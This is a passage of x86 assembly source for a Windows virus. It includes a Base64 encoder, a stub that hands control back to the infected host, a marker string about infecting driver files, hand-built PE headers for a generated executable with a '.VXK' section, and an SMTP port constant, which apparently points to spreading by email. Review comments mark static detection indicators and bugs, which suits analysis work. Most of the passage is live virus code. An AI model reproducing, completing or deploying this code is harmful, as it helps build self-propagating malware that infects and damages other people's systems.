mov eax,dword ptr [ebp+response] ; the reply code bytes
ret

errorSR:
pop eax
mov eax,SOCKET_ERR
ret

CoolEnd: ; bare return stub; its callers are outside this part of the listing
retn
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;
; encodeBase64 by BBT in the 13th. All rights reserved ;)
; Feel free to modify and distribute this code.
; Size of data to encode must be: (size mod 3)=0!
; I don't do padding :(
;
; in: eax address of data to encode
; edx address to put encoded data
; ecx size of data to encode (non-zero multiple of 3)
;
; out: ecx size of encoded data
; edx address just past the encoded data (genMessage continues writing there)
;
; Notes (review):
; - Each 3-byte group becomes 4 alphabet characters; a CR LF is inserted
; after every 13 groups (52 output characters). No '=' padding is written.
; - The loop counts down with 'sub ecx,3 / jne': a size that is not a
; multiple of 3 never reaches zero.
; - esp is used as the groups-per-line counter for the whole loop
; ('push esp ... xor esp,esp ... pop esp'), so there is no valid stack while
; encoding: an exception raised inside the loop (e.g. a fault on the source
; or destination page) cannot be dispatched.
; - encTable is addressed here without the ebp delta used everywhere else.
; - Clobbers eax, ebx, esi, edi, flags; esi is left equal to the output size.
;
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
encodeBase64:
xor esi,esi ; esi = output offset
lea edi,encTable ; edi -> alphabet
push esp ; save the real stack pointer ...
xor esp,esp ; ... and reuse esp as the groups-on-this-line counter
baseLoop:

xor ebx,ebx
mov bl,byte ptr [eax] ; char 0: top 6 bits of byte 0
shr bl,2
and bl,00111111b
mov bh,byte ptr [edi+ebx]
mov byte ptr [edx+esi],bh
inc esi

mov bx,word ptr [eax] ; char 1: low 2 bits of byte 0 + top 4 bits of byte 1
xchg bl,bh
shr bx,4
mov bh,0
and bl,00111111b
mov bh,byte ptr [edi+ebx]
mov byte ptr [edx+esi],bh
inc esi

inc eax
mov bx,word ptr [eax] ; char 2: low 4 bits of byte 1 + top 2 bits of byte 2
xchg bl,bh
shr bx,6
mov bh,0
and bl,00111111b
mov bh,byte ptr [edi+ebx]
mov byte ptr [edx+esi],bh
inc esi

inc eax
xor ebx,ebx
mov bl,byte ptr [eax] ; char 3: low 6 bits of byte 2
and bl,00111111b
mov bh,byte ptr [edi+ebx]
mov byte ptr [edx+esi],bh
inc esi
inc eax ; eax -> next 3-byte group

inc esp ; the counter advances by 2 per group; a line break is taken once it passes 24
cmp esp,24
ja addEndOfLine
inc esp

addedEndOfLine:
sub ecx,3
cmp ecx,0
jne baseLoop

mov ecx,esi ; size of the encoded data
add edx,esi ; end of the encoded data
pop esp ; restore the real stack pointer
ret

addEndOfLine:
xor esp,esp ; new line: reset the counter and emit CR LF
mov word ptr [edx+esi],0a0dh
add esi,2
jmp addedEndOfLine


ret_host: ; hand control back to the host
popad ; restore the registers saved at virus entry
db 0FFh,25h ; opcode bytes of 'jmp dword ptr [imm32]' (absolute indirect jump) ...
Ret2ApiCall:
dd 0 ; ... whose 32-bit operand is this dword; it is filled in elsewhere (by its name, with the location holding the original entry / API address)
VEND:
db "AIDS Test A Example To Infect Driver Files",0 ; plain-text marker embedded in the body (static indicator)
;*****************PE Data*****************************
; Import directory of the PE image described by the headers below: one
; IMAGE_IMPORT_DESCRIPTOR followed by a zero terminator. '+ @' is applied to
; every RVA here and in the headers; its definition is not in this part of the
; listing (presumably the adjustment from code offset to RVA).
VImports:
dd offset Kernel32_Pointers + @ ; OriginalFirstThunk -> import lookup table
dd -1,-1 ; TimeDateStamp, ForwarderChain
dd offset Kernel32_Name + @ ; Name -> DLL name string
VIAT:
dd offset Kernel32_Relocated + @ ; FirstThunk -> IAT (also published as the IAT data directory below)
db 14 dup (0) ; terminating descriptor; NOTE(review): a descriptor is 20 bytes, so these 14 zero bytes overlap the start of Kernel32_Pointers — whether the loader accepts this depends on which fields it tests for zero
Kernel32_Pointers dd offset Kernel32_Beep + @ , 0 ; lookup table: one IMAGE_IMPORT_BY_NAME entry, then terminator
Kernel32_Relocated dd offset Kernel32_Beep + @ , 0 ; IAT: same entry, overwritten by the loader with the resolved address
Kernel32_Beep db ?,?,'MessageBoxA',0 ; IMAGE_IMPORT_BY_NAME: 2-byte hint, then the name — despite the label this imports MessageBoxA, not Beep
Kernel32_Name db 'User32.dll',0 ; despite the label, the imported DLL is User32.dll

; Minimal 64-byte MS-DOS header followed directly by the PE signature:
; 'MZ' at offset 0, e_lfanew (offset 3Ch) = 40h, "PE\0\0" at 40h.
; No real DOS stub program is present.
MDosStub:
db 4Dh,5Ah,90h,00,03,00, 00, 00, 04, 00, 00,00,0FFh,0FFh,00,00 ; 'MZ' ...
db 0B8h,00,00,00, 00, 00, 00, 00,40h, 00, 00, 00, 00, 00,00,00
db 00, 00, 00,00,00,00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
db 00, 00, 00, 00,00,00,00,00, 00, 00, 00, 00, 40h, 00, 00, 00 ; e_lfanew = 40h
db 50h,45h,00,00 ; "PE\0\0"

; IMAGE_FILE_HEADER of the generated image.
MFileHeader:
Machine dw 14Ch ; IMAGE_FILE_MACHINE_I386
NumberOfSections dw 1 ; a single section (.VXK, below)
TimeDateStamp dd 3cbe5cc2h ; fixed link timestamp — identical in every generated file (static indicator)
PointerToSymbolTable dd 0
NumberOfSymbols dd 0
SizeOfOptionalHeader dw 0e0h ; 224 bytes: a standard PE32 optional header
Characteristics dw 10fh ; RELOCS_STRIPPED | EXECUTABLE_IMAGE | LINE_NUMS_STRIPPED | LOCAL_SYMS_STRIPPED | 32BIT_MACHINE

; IMAGE_OPTIONAL_HEADER32 of the generated image. Code, data and entry point
; all live in the one section at RVA 1000h.
MIMAGE_OPTIONAL_HEADER32:
Magic dw 10bh ; PE32
MajorLinkerVersion db 5
MinorLinkerVersion db 12
SizeOfCode dd 0
SizeOfInitializedData dd 0
SizeOfUninitializedData dd 0
AddressOfEntryPoint dd 1000h ; start of the single section = VStart
BaseOfCode dd 1000h
BaseOfData dd 3000h
ImageBase dd 400000h
SectionAlignment dd 1000h
FileAlignment dd 200h
MajorOperatingSystemVersion dw 4
MinorOperatingSystemVersion dw 0
MajorImageVersion dw 0
MinorImageVersion dw 0
MajorSubsystemVersion dw 4
MinorSubsystemVersion dw 0
Win32Versionvalue dd 0
SizeOfImage dd 3000h;need to change st (must cover headers + the section rounded up to SectionAlignment)
SizeOfHeaders dd 200h ; the section's raw data starts right after this (PointerToRawData below)
CheckSum dd 0
Subsystem dw 2 ;(Windows GUI)
DllCharacteristics dw 0
SizeOfStackReserve dd 100000h
SizeOfStackCommit dd 1000h
SizeOfHeapReserve dd 100000h
SizeOfHeapCommit dd 1000h
LoaderFlags dd 0
NumberOfRvaAndSizes dd 10h ; 16 data directory entries follow
DataDirectory dd 0,0 ; [0] export: none
dd offset VImports+@,VIMPORT_SIZE ; [1] import -> VImports (VIMPORT_SIZE is defined outside this part of the listing)
dd 14h dup(0) ; [2]..[11] resource, exception, security, basereloc, debug, architecture, globalptr, TLS, load config, bound import: none
dd offset VIAT + @,8 ; [12] IAT -> VIAT, 8 bytes (one entry + terminator)
dd 0,0,0,0,0,0 ; [13]..[15] delay import, COM descriptor, reserved: none

; IMAGE_SECTION_HEADER for the single section that holds the whole body.
MIMAGE_SECTION_HEADER:
Name1 db '.VXK',0,0,0,0 ; section name — distinctive and constant (static indicator)
VirtualSize dd offset VEnd - offset VStart ; whole body, VStart..VEnd
VirtualAddress dd 1000h ; matches AddressOfEntryPoint / BaseOfCode
SizeOfRawData dd 0 ; presumably filled in when the file is written (not visible here)
PointerToRawData dd 200h ; right after the headers (SizeOfHeaders = 200h)
PointerToRelocations dd 0
PointerToLinenumbers dd 0
NumberOfRelocations dw 0
NumberOfLinenumbers dw 0
Characteristic dd 0E0000020h ; CNT_CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE — a writable and executable section, a common heuristic trigger for scanners
PORT equ 25 ; SMTP — 'thread' connects to this port
VEnd: ; end of the body
V_len=$-offset VStart ; total body length in bytes

End VStart ; assembler end directive; VStart is the entry point
